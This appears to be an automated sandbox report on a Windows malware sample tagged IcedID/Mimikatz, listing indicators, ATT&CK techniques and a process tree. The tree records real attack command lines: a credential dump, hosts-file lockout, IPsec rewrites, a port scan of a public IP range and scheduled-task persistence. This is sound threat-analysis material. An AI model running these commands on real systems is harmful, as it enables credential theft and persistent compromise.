Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cacls.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	net.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	ncgcflyve.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cacls.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	netsh.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	net.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	netsh.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	netsh.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	netsh.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	net.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	netsh.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	net.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	net1.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	sc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cacls.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	pnreyic.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	net1.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	netsh.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	sc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cacls.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	PING.EXE
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	net.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	net.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	pnreyic.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cacls.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	schtasks.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	wpcap.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	net1.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	schtasks.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	sc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cacls.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	net.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	net1.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	netsh.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	net1.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	iaacws.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	schtasks.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	netsh.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	netsh.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	netsh.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	net.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	2024-11-02_a1e1f5c40484de02cf1e54919b717f2d_hacktools_icedid_mimikatz.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	netsh.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	net1.exe

System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs

Adversaries may check for Internet connectivity on compromised systems.

discovery

Internet Connection Discovery

T1016.001

pid	Process
1116	cmd.exe
4332	PING.EXE

NSIS installer 3 IoCs

installer

resource	yara_rule
behavioral2/files/0x000b000000023b58-6.dat	nsis_installer_2
behavioral2/files/0x0014000000023b70-15.dat	nsis_installer_1
behavioral2/files/0x0014000000023b70-15.dat	nsis_installer_2

Modifies data under HKEY_USERS 45 IoCs

description	ioc	Process
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1"	cntrtrctt.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1"	pnreyic.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1"	cntrtrctt.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump	cntrtrctt.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1"	cntrtrctt.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump	cntrtrctt.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1"	cntrtrctt.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing	cntrtrctt.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1"	cntrtrctt.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing	pnreyic.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	pnreyic.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1"	cntrtrctt.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump	cntrtrctt.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1"	cntrtrctt.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump	cntrtrctt.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1"	pnreyic.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0"	pnreyic.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1"	cntrtrctt.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump	cntrtrctt.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump	cntrtrctt.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump	cntrtrctt.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump	cntrtrctt.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump	cntrtrctt.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1"	cntrtrctt.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1"	cntrtrctt.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump	cntrtrctt.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals	cntrtrctt.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1"	cntrtrctt.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump	cntrtrctt.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1"	cntrtrctt.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump	cntrtrctt.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1"	cntrtrctt.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump	cntrtrctt.exe
Key created	\REGISTRY\USER\.DEFAULT\Software	cntrtrctt.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1"	cntrtrctt.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1"	cntrtrctt.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1"	cntrtrctt.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump	cntrtrctt.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1"	cntrtrctt.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump	cntrtrctt.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1"	pnreyic.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump	cntrtrctt.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump	cntrtrctt.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump	cntrtrctt.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1"	cntrtrctt.exe

Modifies registry class 14 IoCs

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.ps1\	pnreyic.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.cmd\ = "txtfile"	pnreyic.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.vbs\	pnreyic.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.vbe\	pnreyic.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.VBE\ = "txtfile"	pnreyic.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.reg\ = "txtfile"	pnreyic.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.ps1\ = "txtfile"	pnreyic.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.bat\	pnreyic.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.js\	pnreyic.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.js\ = "txtfile"	pnreyic.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.vbs\ = "txtfile"	pnreyic.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.reg\	pnreyic.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.bat\ = "txtfile"	pnreyic.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.cmd\	pnreyic.exe

Runs net.exe

Runs ping.exe 1 TTPs 1 IoCs

Remote System Discovery

T1018

pid	Process
4332	PING.EXE

Scheduled Task/Job: Scheduled Task 1 TTPs 3 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence execution

Scheduled Task

T1053.005

pid	Process
4196	schtasks.exe
3524	schtasks.exe
3700	schtasks.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
216	pnreyic.exe
216	pnreyic.exe
216	pnreyic.exe
216	pnreyic.exe
216	pnreyic.exe
216	pnreyic.exe
216	pnreyic.exe
216	pnreyic.exe
216	pnreyic.exe
216	pnreyic.exe
216	pnreyic.exe
216	pnreyic.exe
216	pnreyic.exe
216	pnreyic.exe
216	pnreyic.exe
216	pnreyic.exe
216	pnreyic.exe
216	pnreyic.exe
216	pnreyic.exe
216	pnreyic.exe
216	pnreyic.exe
216	pnreyic.exe
216	pnreyic.exe
216	pnreyic.exe
216	pnreyic.exe
216	pnreyic.exe
216	pnreyic.exe
216	pnreyic.exe
216	pnreyic.exe
216	pnreyic.exe
216	pnreyic.exe
216	pnreyic.exe
216	pnreyic.exe
216	pnreyic.exe
216	pnreyic.exe
216	pnreyic.exe
216	pnreyic.exe
216	pnreyic.exe
216	pnreyic.exe
216	pnreyic.exe
216	pnreyic.exe
216	pnreyic.exe
216	pnreyic.exe
216	pnreyic.exe
216	pnreyic.exe
216	pnreyic.exe
216	pnreyic.exe
216	pnreyic.exe
216	pnreyic.exe
216	pnreyic.exe
216	pnreyic.exe
216	pnreyic.exe
216	pnreyic.exe
216	pnreyic.exe
216	pnreyic.exe
216	pnreyic.exe
216	pnreyic.exe
216	pnreyic.exe
216	pnreyic.exe
216	pnreyic.exe
216	pnreyic.exe
216	pnreyic.exe
216	pnreyic.exe
216	pnreyic.exe

Suspicious behavior: LoadsDriver 15 IoCs

pid	Process
640	Process not Found
640	Process not Found
640	Process not Found
640	Process not Found
640	Process not Found
640	Process not Found
640	Process not Found
640	Process not Found
640	Process not Found
640	Process not Found
640	Process not Found
640	Process not Found
640	Process not Found
640	Process not Found
640	Process not Found

Suspicious behavior: RenamesItself 1 IoCs

pid	Process
1476	2024-11-02_a1e1f5c40484de02cf1e54919b717f2d_hacktools_icedid_mimikatz.exe

Suspicious use of AdjustPrivilegeToken 24 IoCs

description	pid	Process
Token: SeDebugPrivilege	1476	2024-11-02_a1e1f5c40484de02cf1e54919b717f2d_hacktools_icedid_mimikatz.exe
Token: SeDebugPrivilege	404	pnreyic.exe
Token: SeDebugPrivilege	216	pnreyic.exe
Token: SeDebugPrivilege	3840	vfshost.exe
Token: SeDebugPrivilege	2432	cntrtrctt.exe
Token: SeLockMemoryPrivilege	4800	zergmt.exe
Token: SeLockMemoryPrivilege	4800	zergmt.exe
Token: SeDebugPrivilege	2476	cntrtrctt.exe
Token: SeDebugPrivilege	1344	cntrtrctt.exe
Token: SeDebugPrivilege	3156	cntrtrctt.exe
Token: SeDebugPrivilege	2320	cntrtrctt.exe
Token: SeDebugPrivilege	4840	cntrtrctt.exe
Token: SeDebugPrivilege	4956	cntrtrctt.exe
Token: SeDebugPrivilege	4160	cntrtrctt.exe
Token: SeDebugPrivilege	3964	cntrtrctt.exe
Token: SeDebugPrivilege	3924	cntrtrctt.exe
Token: SeDebugPrivilege	4776	cntrtrctt.exe
Token: SeDebugPrivilege	904	cntrtrctt.exe
Token: SeDebugPrivilege	3020	cntrtrctt.exe
Token: SeDebugPrivilege	5080	cntrtrctt.exe
Token: SeDebugPrivilege	4060	cntrtrctt.exe
Token: SeDebugPrivilege	2296	cntrtrctt.exe
Token: SeDebugPrivilege	2544	cntrtrctt.exe
Token: SeDebugPrivilege	4396	cntrtrctt.exe

Suspicious use of SetWindowsHookEx 12 IoCs

pid	Process
1476	2024-11-02_a1e1f5c40484de02cf1e54919b717f2d_hacktools_icedid_mimikatz.exe
1476	2024-11-02_a1e1f5c40484de02cf1e54919b717f2d_hacktools_icedid_mimikatz.exe
404	pnreyic.exe
404	pnreyic.exe
216	pnreyic.exe
216	pnreyic.exe
2736	xohudmc.exe
3912	iaacws.exe
3544	pnreyic.exe
3544	pnreyic.exe
5616	pnreyic.exe
5616	pnreyic.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 1476 wrote to memory of 1116	1476	2024-11-02_a1e1f5c40484de02cf1e54919b717f2d_hacktools_icedid_mimikatz.exe	85
PID 1476 wrote to memory of 1116	1476	2024-11-02_a1e1f5c40484de02cf1e54919b717f2d_hacktools_icedid_mimikatz.exe	85
PID 1476 wrote to memory of 1116	1476	2024-11-02_a1e1f5c40484de02cf1e54919b717f2d_hacktools_icedid_mimikatz.exe	85
PID 1116 wrote to memory of 4332	1116	cmd.exe	87
PID 1116 wrote to memory of 4332	1116	cmd.exe	87
PID 1116 wrote to memory of 4332	1116	cmd.exe	87
PID 1116 wrote to memory of 404	1116	cmd.exe	97
PID 1116 wrote to memory of 404	1116	cmd.exe	97
PID 1116 wrote to memory of 404	1116	cmd.exe	97
PID 216 wrote to memory of 2824	216	pnreyic.exe	99
PID 216 wrote to memory of 2824	216	pnreyic.exe	99
PID 216 wrote to memory of 2824	216	pnreyic.exe	99
PID 2824 wrote to memory of 4248	2824	cmd.exe	101
PID 2824 wrote to memory of 4248	2824	cmd.exe	101
PID 2824 wrote to memory of 4248	2824	cmd.exe	101
PID 2824 wrote to memory of 4640	2824	cmd.exe	102
PID 2824 wrote to memory of 4640	2824	cmd.exe	102
PID 2824 wrote to memory of 4640	2824	cmd.exe	102
PID 2824 wrote to memory of 2788	2824	cmd.exe	103
PID 2824 wrote to memory of 2788	2824	cmd.exe	103
PID 2824 wrote to memory of 2788	2824	cmd.exe	103
PID 2824 wrote to memory of 5008	2824	cmd.exe	104
PID 2824 wrote to memory of 5008	2824	cmd.exe	104
PID 2824 wrote to memory of 5008	2824	cmd.exe	104
PID 2824 wrote to memory of 3020	2824	cmd.exe	105
PID 2824 wrote to memory of 3020	2824	cmd.exe	105
PID 2824 wrote to memory of 3020	2824	cmd.exe	105
PID 2824 wrote to memory of 1520	2824	cmd.exe	107
PID 2824 wrote to memory of 1520	2824	cmd.exe	107
PID 2824 wrote to memory of 1520	2824	cmd.exe	107
PID 216 wrote to memory of 2400	216	pnreyic.exe	110
PID 216 wrote to memory of 2400	216	pnreyic.exe	110
PID 216 wrote to memory of 2400	216	pnreyic.exe	110
PID 216 wrote to memory of 2456	216	pnreyic.exe	112
PID 216 wrote to memory of 2456	216	pnreyic.exe	112
PID 216 wrote to memory of 2456	216	pnreyic.exe	112
PID 216 wrote to memory of 1760	216	pnreyic.exe	114
PID 216 wrote to memory of 1760	216	pnreyic.exe	114
PID 216 wrote to memory of 1760	216	pnreyic.exe	114
PID 216 wrote to memory of 4436	216	pnreyic.exe	120
PID 216 wrote to memory of 4436	216	pnreyic.exe	120
PID 216 wrote to memory of 4436	216	pnreyic.exe	120
PID 4436 wrote to memory of 4112	4436	cmd.exe	122
PID 4436 wrote to memory of 4112	4436	cmd.exe	122
PID 4436 wrote to memory of 4112	4436	cmd.exe	122
PID 4112 wrote to memory of 3428	4112	wpcap.exe	123
PID 4112 wrote to memory of 3428	4112	wpcap.exe	123
PID 4112 wrote to memory of 3428	4112	wpcap.exe	123
PID 3428 wrote to memory of 1608	3428	net.exe	125
PID 3428 wrote to memory of 1608	3428	net.exe	125
PID 3428 wrote to memory of 1608	3428	net.exe	125
PID 4112 wrote to memory of 4304	4112	wpcap.exe	126
PID 4112 wrote to memory of 4304	4112	wpcap.exe	126
PID 4112 wrote to memory of 4304	4112	wpcap.exe	126
PID 4304 wrote to memory of 5100	4304	net.exe	128
PID 4304 wrote to memory of 5100	4304	net.exe	128
PID 4304 wrote to memory of 5100	4304	net.exe	128
PID 4112 wrote to memory of 3032	4112	wpcap.exe	129
PID 4112 wrote to memory of 3032	4112	wpcap.exe	129
PID 4112 wrote to memory of 3032	4112	wpcap.exe	129
PID 3032 wrote to memory of 4660	3032	net.exe	131
PID 3032 wrote to memory of 4660	3032	net.exe	131
PID 3032 wrote to memory of 4660	3032	net.exe	131
PID 4112 wrote to memory of 4504	4112	wpcap.exe	132

C:\Windows\System32\spoolsv.exe
C:\Windows\System32\spoolsv.exe
1⤵
PID:2132
- C:\Windows\TEMP\gcettrccj\zergmt.exe
  "C:\Windows\TEMP\gcettrccj\zergmt.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of AdjustPrivilegeToken
  PID:4800

C:\Users\Admin\AppData\Local\Temp\2024-11-02_a1e1f5c40484de02cf1e54919b717f2d_hacktools_icedid_mimikatz.exe
"C:\Users\Admin\AppData\Local\Temp\2024-11-02_a1e1f5c40484de02cf1e54919b717f2d_hacktools_icedid_mimikatz.exe"
1⤵
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: RenamesItself
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:1476
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ping 127.0.0.1 -n 5 & Start C:\Windows\hrmeszcf\pnreyic.exe
  2⤵
  - System Location Discovery: System Language Discovery
  - System Network Configuration Discovery: Internet Connection Discovery
  - Suspicious use of WriteProcessMemory
  PID:1116
- - C:\Windows\SysWOW64\PING.EXE
    ping 127.0.0.1 -n 5
    3⤵
    - System Location Discovery: System Language Discovery
    - System Network Configuration Discovery: Internet Connection Discovery
    - Runs ping.exe
    PID:4332
- - C:\Windows\hrmeszcf\pnreyic.exe
    C:\Windows\hrmeszcf\pnreyic.exe
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of SetWindowsHookEx
    PID:404

C:\Windows\hrmeszcf\pnreyic.exe
C:\Windows\hrmeszcf\pnreyic.exe
1⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in Drivers directory
- Event Triggered Execution: Image File Execution Options Injection
- Executes dropped EXE
- Drops file in System32 directory
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Modifies data under HKEY_USERS
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:216
- C:\Windows\SysWOW64\cmd.exe
  cmd /c echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D users & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D administrators & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM
  2⤵
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:2824
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo Y"
    3⤵
    - System Location Discovery: System Language Discovery
    PID:4248
- - C:\Windows\SysWOW64\cacls.exe
    cacls C:\Windows\system32\drivers\etc\hosts /T /D users
    3⤵
    - System Location Discovery: System Language Discovery
    PID:4640
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo Y"
    3⤵
    - System Location Discovery: System Language Discovery
    PID:2788
- - C:\Windows\SysWOW64\cacls.exe
    cacls C:\Windows\system32\drivers\etc\hosts /T /D administrators
    3⤵
    - System Location Discovery: System Language Discovery
    PID:5008
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo Y"
    3⤵
    PID:3020
- - C:\Windows\SysWOW64\cacls.exe
    cacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM
    3⤵
    - System Location Discovery: System Language Discovery
    PID:1520
- C:\Windows\SysWOW64\netsh.exe
  netsh ipsec static del all
  2⤵
  - Event Triggered Execution: Netsh Helper DLL
  PID:2400
- C:\Windows\SysWOW64\netsh.exe
  netsh ipsec static add policy name=Bastards description=FuckingBastards
  2⤵
  - Event Triggered Execution: Netsh Helper DLL
  - System Location Discovery: System Language Discovery
  PID:2456
- C:\Windows\SysWOW64\netsh.exe
  netsh ipsec static add filteraction name=BastardsList action=block
  2⤵
  - Event Triggered Execution: Netsh Helper DLL
  - System Location Discovery: System Language Discovery
  PID:1760
- C:\Windows\SysWOW64\cmd.exe
  cmd /c C:\Windows\nblmptktz\etgfqftjv\wpcap.exe /S
  2⤵
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:4436
- - C:\Windows\nblmptktz\etgfqftjv\wpcap.exe
    C:\Windows\nblmptktz\etgfqftjv\wpcap.exe /S
    3⤵
    - Drops file in Drivers directory
    - Executes dropped EXE
    - Loads dropped DLL
    - Drops file in System32 directory
    - Drops file in Program Files directory
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:4112
  - - C:\Windows\SysWOW64\net.exe
      net stop "Boundary Meter"
      4⤵
      System Location Discovery: System Language Discovery
      Suspicious use of WriteProcessMemory
      PID:3428
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop "Boundary Meter"
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:1608
  - - C:\Windows\SysWOW64\net.exe
      net stop "TrueSight Meter"
      4⤵
      System Location Discovery: System Language Discovery
      Suspicious use of WriteProcessMemory
      PID:4304
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop "TrueSight Meter"
        5⤵
        
        PID:5100
  - - C:\Windows\SysWOW64\net.exe
      net stop npf
      4⤵
      System Location Discovery: System Language Discovery
      Suspicious use of WriteProcessMemory
      PID:3032
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop npf
        5⤵
        
        PID:4660
  - - C:\Windows\SysWOW64\net.exe
      net start npf
      4⤵
      System Location Discovery: System Language Discovery
      PID:4504
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 start npf
        5⤵
        
        PID:4264
- C:\Windows\SysWOW64\cmd.exe
  cmd /c net start npf
  2⤵
  PID:2016
- - C:\Windows\SysWOW64\net.exe
    net start npf
    3⤵
    PID:1220
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 start npf
      4⤵
      System Location Discovery: System Language Discovery
      PID:1632
- C:\Windows\SysWOW64\cmd.exe
  cmd /c net start npf
  2⤵
  PID:4336
- - C:\Windows\SysWOW64\net.exe
    net start npf
    3⤵
    - System Location Discovery: System Language Discovery
    PID:4300
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 start npf
      4⤵
      System Location Discovery: System Language Discovery
      PID:2296
- C:\Windows\SysWOW64\cmd.exe
  cmd /c C:\Windows\nblmptktz\etgfqftjv\ttsqkuccf.exe -p 80 222.186.128.1-222.186.255.255 --rate=1024 -oJ C:\Windows\nblmptktz\etgfqftjv\Scant.txt
  2⤵
  PID:4316
- - C:\Windows\nblmptktz\etgfqftjv\ttsqkuccf.exe
    C:\Windows\nblmptktz\etgfqftjv\ttsqkuccf.exe -p 80 222.186.128.1-222.186.255.255 --rate=1024 -oJ C:\Windows\nblmptktz\etgfqftjv\Scant.txt
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    PID:2588
- C:\Windows\SysWOW64\cmd.exe
  cmd /c C:\Windows\nblmptktz\Corporate\vfshost.exe privilege::debug sekurlsa::logonpasswords exit >> C:\Windows\nblmptktz\Corporate\log.txt
  2⤵
  - Drops file in Windows directory
  PID:2808
- - C:\Windows\nblmptktz\Corporate\vfshost.exe
    C:\Windows\nblmptktz\Corporate\vfshost.exe privilege::debug sekurlsa::logonpasswords exit
    3⤵
    - Executes dropped EXE
    - Suspicious use of AdjustPrivilegeToken
    PID:3840
- C:\Windows\SysWOW64\cmd.exe
  cmd /c echo Y|schtasks /create /sc minute /mo 1 /tn "armegntcm" /ru system /tr "cmd /c C:\Windows\ime\pnreyic.exe"
  2⤵
  PID:3436
